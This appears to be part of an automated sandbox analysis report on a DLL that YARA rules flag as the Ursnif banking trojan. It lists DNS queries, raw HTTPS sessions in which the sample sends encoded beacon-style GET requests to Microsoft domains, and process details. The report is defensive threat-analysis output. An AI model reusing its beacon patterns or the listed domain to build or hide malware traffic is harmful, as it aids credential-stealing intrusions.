                                                                                                                                Oct 12, 2021 00:51:43.325108051 CEST8.8.8.8192.168.2.30xcd71No error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:43.325108051 CEST8.8.8.8192.168.2.30xcd71No error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:43.325108051 CEST8.8.8.8192.168.2.30xcd71No error (0)outlook.ms-acdc.office.comFRA-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:43.325108051 CEST8.8.8.8192.168.2.30xcd71No error (0)FRA-efz.ms-acdc.office.com52.98.207.210A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:43.325108051 CEST8.8.8.8192.168.2.30xcd71No error (0)FRA-efz.ms-acdc.office.com52.97.151.18A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:43.325108051 CEST8.8.8.8192.168.2.30xcd71No error (0)FRA-efz.ms-acdc.office.com52.97.151.66A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:43.486862898 CEST8.8.8.8192.168.2.30x8ed1No error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:43.486862898 CEST8.8.8.8192.168.2.30x8ed1No error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:43.486862898 CEST8.8.8.8192.168.2.30x8ed1No error (0)outlook.ms-acdc.office.comHHN-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:43.486862898 CEST8.8.8.8192.168.2.30x8ed1No error (0)HHN-efz.ms-acdc.office.com40.101.60.226A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:43.486862898 CEST8.8.8.8192.168.2.30x8ed1No error (0)HHN-efz.ms-acdc.office.com40.101.124.2A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:43.486862898 CEST8.8.8.8192.168.2.30x8ed1No error (0)HHN-efz.ms-acdc.office.com52.98.171.226A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:43.486862898 CEST8.8.8.8192.168.2.30x8ed1No error (0)HHN-efz.ms-acdc.office.com40.101.62.34A (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:51:49.169133902 CEST8.8.8.8192.168.2.30xc5f5Name error (3)areuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:52:04.047215939 CEST8.8.8.8192.168.2.30x6b6fName error (3)areuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                                                                Oct 12, 2021 00:52:09.213083982 CEST8.8.8.8192.168.2.30x2e04No error (0)msn.com13.82.28.61A (IP address)IN (0x0001)

                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                • msn.com
                                                                                                                                • outlook.com
                                                                                                                                • www.outlook.com
                                                                                                                                • outlook.office365.com

                                                                                                                                HTTPS Proxied Packets

                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                0192.168.2.34975913.82.28.61443C:\Windows\System32\loaddll32.exe
                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                2021-10-11 22:50:46 UTC0OUTGET /mail/liopolo/Vn4JvoFId6Cp3NLYZ/ukfCWWcxchPj/qCUcA7g4p8o/IzqGGngZx49dkT/_2Fc3sEBBXvAEYkPgeGA_/2By9PpRoLgfve_2F/vhfdT7HCV506AwB/36mBvSW_2FRJGuHNuA/yE6OJX0fi/uPoeQfh7fRd0REpiPmsf/t9myfegLaxJw_2B8ay_/2FKKbEnJu_2BUYEu1pJNUs/ydzaPjLRj/fW1.jre HTTP/1.1
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Pragma: no-cache
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                Host: msn.com
                                                                                                                                2021-10-11 22:50:47 UTC0INHTTP/1.1 301 Moved Permanently
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Location: https://www.msn.com/mail/liopolo/Vn4JvoFId6Cp3NLYZ/ukfCWWcxchPj/qCUcA7g4p8o/IzqGGngZx49dkT/_2Fc3sEBBXvAEYkPgeGA_/2By9PpRoLgfve_2F/vhfdT7HCV506AwB/36mBvSW_2FRJGuHNuA/yE6OJX0fi/uPoeQfh7fRd0REpiPmsf/t9myfegLaxJw_2B8ay_/2FKKbEnJu_2BUYEu1pJNUs/ydzaPjLRj/fW1.jre
                                                                                                                                Server: Microsoft-IIS/8.5
                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                Date: Mon, 11 Oct 2021 22:50:46 GMT
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 379
                                                                                                                                2021-10-11 22:50:47 UTC0INData Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 73 6e 2e 63 6f 6d 2f 6d 61 69 6c 2f 6c 69 6f 70 6f 6c 6f 2f 56 6e 34 4a 76 6f 46 49 64 36 43 70 33 4e 4c 59 5a 2f 75 6b 66 43 57 57 63 78 63 68 50 6a 2f 71 43 55 63 41 37 67 34 70 38 6f 2f 49 7a 71 47 47 6e 67 5a 78 34 39 64 6b 54 2f 5f 32 46 63 33 73 45 42 42 58 76 41 45 59 6b 50 67 65 47 41 5f 2f 32 42 79 39 50 70 52 6f 4c 67 66 76 65 5f 32 46 2f 76 68 66 64 54 37 48 43 56 35 30 36 41 77 42 2f 33 36 6d
                                                                                                                                Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/Vn4JvoFId6Cp3NLYZ/ukfCWWcxchPj/qCUcA7g4p8o/IzqGGngZx49dkT/_2Fc3sEBBXvAEYkPgeGA_/2By9PpRoLgfve_2F/vhfdT7HCV506AwB/36m


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                1192.168.2.34976613.82.28.61443C:\Windows\System32\loaddll32.exe
                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                2021-10-11 22:51:00 UTC1OUTGET /mail/liopolo/iPe0RJr3YRoIqgJZ/bp29G1GzQQlGJM_/2FuLuVprzaPw0SE4HN/zn7OVuGKs/tq7CtgIlmwdVETSdZ_2B/b8UUaR4yA5m9yE7vka1/Gh0JtvuATrVobNbwlsuYfN/IReexc6mib3Oj/OUfheoEg/Oot_2BsNxyrozYIcd4Px1xV/TZHusM6SVs/2zs_2FZfacHwT9roF/sfywcfJ4/Yw.jre HTTP/1.1
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Pragma: no-cache
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                Host: msn.com
                                                                                                                                2021-10-11 22:51:00 UTC1INHTTP/1.1 301 Moved Permanently
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Location: https://www.msn.com/mail/liopolo/iPe0RJr3YRoIqgJZ/bp29G1GzQQlGJM_/2FuLuVprzaPw0SE4HN/zn7OVuGKs/tq7CtgIlmwdVETSdZ_2B/b8UUaR4yA5m9yE7vka1/Gh0JtvuATrVobNbwlsuYfN/IReexc6mib3Oj/OUfheoEg/Oot_2BsNxyrozYIcd4Px1xV/TZHusM6SVs/2zs_2FZfacHwT9roF/sfywcfJ4/Yw.jre
                                                                                                                                Server: Microsoft-IIS/8.5
                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                Date: Mon, 11 Oct 2021 22:50:59 GMT
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 373
                                                                                                                                2021-10-11 22:51:00 UTC2INData Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 73 6e 2e 63 6f 6d 2f 6d 61 69 6c 2f 6c 69 6f 70 6f 6c 6f 2f 69 50 65 30 52 4a 72 33 59 52 6f 49 71 67 4a 5a 2f 62 70 32 39 47 31 47 7a 51 51 6c 47 4a 4d 5f 2f 32 46 75 4c 75 56 70 72 7a 61 50 77 30 53 45 34 48 4e 2f 7a 6e 37 4f 56 75 47 4b 73 2f 74 71 37 43 74 67 49 6c 6d 77 64 56 45 54 53 64 5a 5f 32 42 2f 62 38 55 55 61 52 34 79 41 35 6d 39 79 45 37 76 6b 61 31 2f 47 68 30 4a 74 76 75 41 54 72 56 6f 62
                                                                                                                                Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/iPe0RJr3YRoIqgJZ/bp29G1GzQQlGJM_/2FuLuVprzaPw0SE4HN/zn7OVuGKs/tq7CtgIlmwdVETSdZ_2B/b8UUaR4yA5m9yE7vka1/Gh0JtvuATrVob


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                2192.168.2.34977940.97.161.50443C:\Windows\System32\loaddll32.exe
                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                2021-10-11 22:51:28 UTC2OUTGET /signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_/2Fr_2B9CI4wQ8pfr/Ae2iDA4fgxuX_2F/EFvlU1RKcf_2BhblV1/R4qA8rb50/6GzaaVaZ467uvOz0B0BG/K6jq9ZPGaLm0dRA_2Bj/N_2Bpix6pkAKp3MF04Fjk4/gUVThkiIQADOb/DN4NS4MK/cUs7VKKK39GCKuME9SOTcIm/_2FCC2gu/C.jre HTTP/1.1
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Pragma: no-cache
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                Host: outlook.com
                                                                                                                                2021-10-11 22:51:28 UTC2INHTTP/1.1 301 Moved Permanently
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                Location: https://www.outlook.com/signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_/2Fr_2B9CI4wQ8pfr/Ae2iDA4fgxuX_2F/EFvlU1RKcf_2BhblV1/R4qA8rb50/6GzaaVaZ467uvOz0B0BG/K6jq9ZPGaLm0dRA_2Bj/N_2Bpix6pkAKp3MF04Fjk4/gUVThkiIQADOb/DN4NS4MK/cUs7VKKK39GCKuME9SOTcIm/_2FCC2gu/C.jre
                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                request-id: 317cc244-0722-c41d-2bc6-bdaf257bb4d7
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                X-FEServer: MWHPR11CA0034
                                                                                                                                X-RequestId: 46bbf0e0-7ef8-408f-a392-a9dc993be4c6
                                                                                                                                MS-CV: RMJ8MSIHHcQrxr2vJXu01w.0
                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                X-FEServer: MWHPR11CA0034
                                                                                                                                Date: Mon, 11 Oct 2021 22:51:28 GMT
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                3192.168.2.34978252.98.207.210443C:\Windows\System32\loaddll32.exe
                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                2021-10-11 22:51:28 UTC3OUTGET /signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_/2Fr_2B9CI4wQ8pfr/Ae2iDA4fgxuX_2F/EFvlU1RKcf_2BhblV1/R4qA8rb50/6GzaaVaZ467uvOz0B0BG/K6jq9ZPGaLm0dRA_2Bj/N_2Bpix6pkAKp3MF04Fjk4/gUVThkiIQADOb/DN4NS4MK/cUs7VKKK39GCKuME9SOTcIm/_2FCC2gu/C.jre HTTP/1.1
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Pragma: no-cache
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                Host: www.outlook.com
                                                                                                                                2021-10-11 22:51:28 UTC4INHTTP/1.1 301 Moved Permanently
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                Location: https://outlook.office365.com/signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_/2Fr_2B9CI4wQ8pfr/Ae2iDA4fgxuX_2F/EFvlU1RKcf_2BhblV1/R4qA8rb50/6GzaaVaZ467uvOz0B0BG/K6jq9ZPGaLm0dRA_2Bj/N_2Bpix6pkAKp3MF04Fjk4/gUVThkiIQADOb/DN4NS4MK/cUs7VKKK39GCKuME9SOTcIm/_2FCC2gu/C.jre
                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                request-id: bbc58b63-0200-d637-1f82-5fe41ae08c7e
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                X-FEServer: AS9PR0301CA0054
                                                                                                                                X-RequestId: 884c23bc-6988-4e6b-ba85-13b6a6e7802c
                                                                                                                                MS-CV: Y4vFuwACN9Yfgl/kGuCMfg.0
                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                X-FEServer: AS9PR0301CA0054
                                                                                                                                Date: Mon, 11 Oct 2021 22:51:28 GMT
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                4192.168.2.34978340.101.60.226443C:\Windows\System32\loaddll32.exe
                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                2021-10-11 22:51:28 UTC4OUTGET /signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_/2Fr_2B9CI4wQ8pfr/Ae2iDA4fgxuX_2F/EFvlU1RKcf_2BhblV1/R4qA8rb50/6GzaaVaZ467uvOz0B0BG/K6jq9ZPGaLm0dRA_2Bj/N_2Bpix6pkAKp3MF04Fjk4/gUVThkiIQADOb/DN4NS4MK/cUs7VKKK39GCKuME9SOTcIm/_2FCC2gu/C.jre HTTP/1.1
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Pragma: no-cache
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                Host: outlook.office365.com
                                                                                                                                2021-10-11 22:51:28 UTC5INHTTP/1.1 404 Not Found
                                                                                                                                Content-Length: 1245
                                                                                                                                Content-Type: text/html
                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                request-id: f95b0919-28f4-47a7-648d-aec4a884b896
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                X-CalculatedFETarget: DB6PR07CU001.internal.outlook.com
                                                                                                                                X-BackEndHttpStatus: 404
                                                                                                                                X-FEProxyInfo: DB6PR07CA0023.EURPRD07.PROD.OUTLOOK.COM
                                                                                                                                X-CalculatedBETarget: DB7P194MB0474.EURP194.PROD.OUTLOOK.COM
                                                                                                                                X-BackEndHttpStatus: 404
                                                                                                                                X-RUM-Validated: 1
                                                                                                                                X-Proxy-RoutingCorrectness: 1
                                                                                                                                X-Proxy-BackendServerStatus: 404
                                                                                                                                MS-CV: GQlb+fQop0dkja7EqIS4lg.1.1
                                                                                                                                X-FEServer: DB6PR07CA0023
                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                X-FEServer: AM5P194CA0003
                                                                                                                                Date: Mon, 11 Oct 2021 22:51:28 GMT
                                                                                                                                Connection: close
                                                                                                                                2021-10-11 22:51:28 UTC6INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c
                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                5192.168.2.34981640.97.161.50443C:\Windows\System32\loaddll32.exe
                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                2021-10-11 22:51:43 UTC7OUTGET /signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwM/OT0v9gJP/37ksb0fn_2FMie_2BYo4csJ/dqKZMmwVVY/NW0eW6kdSEZXJYqwn/QNXYETIahUBU/o58GZV2YU8a/BbpCAOptavmy35/f7j8F4VRrMxGtvE_2FpUR/raE_2Bxf0kZoKM1o/ZbBDSIO0tnuHu4l/cpfED0PavpBMJm1ykA/Lck.jre HTTP/1.1
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Pragma: no-cache
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                Host: outlook.com
                                                                                                                                2021-10-11 22:51:43 UTC7INHTTP/1.1 301 Moved Permanently
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                Location: https://www.outlook.com/signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwM/OT0v9gJP/37ksb0fn_2FMie_2BYo4csJ/dqKZMmwVVY/NW0eW6kdSEZXJYqwn/QNXYETIahUBU/o58GZV2YU8a/BbpCAOptavmy35/f7j8F4VRrMxGtvE_2FpUR/raE_2Bxf0kZoKM1o/ZbBDSIO0tnuHu4l/cpfED0PavpBMJm1ykA/Lck.jre
                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                request-id: 2129bc54-af0a-cd98-b796-ce58b9a66f1a
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                X-FEServer: MWHPR11CA0044
                                                                                                                                X-RequestId: 520fcc81-91de-431f-b63c-64a04ba5b2fa
                                                                                                                                MS-CV: VLwpIQqvmM23ls5YuaZvGg.0
                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                X-FEServer: MWHPR11CA0044
                                                                                                                                Date: Mon, 11 Oct 2021 22:51:43 GMT
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                6192.168.2.34982052.98.207.210443C:\Windows\System32\loaddll32.exe
                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                2021-10-11 22:51:43 UTC8OUTGET /signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwM/OT0v9gJP/37ksb0fn_2FMie_2BYo4csJ/dqKZMmwVVY/NW0eW6kdSEZXJYqwn/QNXYETIahUBU/o58GZV2YU8a/BbpCAOptavmy35/f7j8F4VRrMxGtvE_2FpUR/raE_2Bxf0kZoKM1o/ZbBDSIO0tnuHu4l/cpfED0PavpBMJm1ykA/Lck.jre HTTP/1.1
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Pragma: no-cache
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                Host: www.outlook.com
                                                                                                                                2021-10-11 22:51:43 UTC8INHTTP/1.1 301 Moved Permanently
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Pragma: no-cache
                                                                                                                                Location: https://outlook.office365.com/signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwM/OT0v9gJP/37ksb0fn_2FMie_2BYo4csJ/dqKZMmwVVY/NW0eW6kdSEZXJYqwn/QNXYETIahUBU/o58GZV2YU8a/BbpCAOptavmy35/f7j8F4VRrMxGtvE_2FpUR/raE_2Bxf0kZoKM1o/ZbBDSIO0tnuHu4l/cpfED0PavpBMJm1ykA/Lck.jre
                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                request-id: dba8ebf3-3dce-76c0-0ac8-5a534885a9c6
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                X-FEServer: AS9PR0301CA0045
                                                                                                                                X-RequestId: 7aae346b-564a-41f4-8c31-dc0c482e6c9d
                                                                                                                                MS-CV: 8+uo2849wHYKyFpTSIWpxg.0
                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                X-FEServer: AS9PR0301CA0045
                                                                                                                                Date: Mon, 11 Oct 2021 22:51:42 GMT
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                7192.168.2.34982140.101.60.226443C:\Windows\System32\loaddll32.exe
                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                2021-10-11 22:51:43 UTC9OUTGET /signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwM/OT0v9gJP/37ksb0fn_2FMie_2BYo4csJ/dqKZMmwVVY/NW0eW6kdSEZXJYqwn/QNXYETIahUBU/o58GZV2YU8a/BbpCAOptavmy35/f7j8F4VRrMxGtvE_2FpUR/raE_2Bxf0kZoKM1o/ZbBDSIO0tnuHu4l/cpfED0PavpBMJm1ykA/Lck.jre HTTP/1.1
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Pragma: no-cache
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                Host: outlook.office365.com
                                                                                                                                2021-10-11 22:51:43 UTC9INHTTP/1.1 404 Not Found
                                                                                                                                Content-Length: 1245
                                                                                                                                Content-Type: text/html
                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                request-id: 7ba0ffc6-f8f8-51ea-5952-b8c598033637
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                X-CalculatedFETarget: PR3P195CU001.internal.outlook.com
                                                                                                                                X-BackEndHttpStatus: 404
                                                                                                                                X-FEProxyInfo: PR3P195CA0027.EURP195.PROD.OUTLOOK.COM
                                                                                                                                X-CalculatedBETarget: PR3P194MB0683.EURP194.PROD.OUTLOOK.COM
                                                                                                                                X-BackEndHttpStatus: 404
                                                                                                                                X-RUM-Validated: 1
                                                                                                                                X-Proxy-RoutingCorrectness: 1
                                                                                                                                X-Proxy-BackendServerStatus: 404
                                                                                                                                MS-CV: xv+ge/j46lFZUrjFmAM2Nw.1.1
                                                                                                                                X-FEServer: PR3P195CA0027
                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                X-FEServer: AM5P194CA0015
                                                                                                                                Date: Mon, 11 Oct 2021 22:51:42 GMT
                                                                                                                                Connection: close
                                                                                                                                2021-10-11 22:51:43 UTC10INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c
                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


                                                                                                                                Code Manipulations

                                                                                                                                Statistics

                                                                                                                                CPU Usage

                                                                                                                                Click to jump to process

                                                                                                                                Memory Usage

                                                                                                                                Click to jump to process

                                                                                                                                High Level Behavior Distribution

                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                Behavior

                                                                                                                                Click to jump to process

                                                                                                                                System Behavior

                                                                                                                                Analysis Process: loaddll32.exe PID: 7088 Parent PID: 3696

                                                                                                                                General

                                                                                                                                Start time:00:49:03
                                                                                                                                Start date:12/10/2021
                                                                                                                                Path:C:\Windows\System32\loaddll32.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:loaddll32.exe 'C:\Users\user\Desktop\616412739e268.dll'
                                                                                                                                Imagebase:0x13b0000
                                                                                                                                File size:893440 bytes
                                                                                                                                MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.636681449.000000000302F000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.504323310.00000000033A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.504453147.00000000033A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.504380266.00000000033A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.504256505.00000000033A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.504206651.00000000033A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.504111647.00000000033A8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.468068395.0000000000B30000.00000040.00000001.sdmp, Author: Joe Security
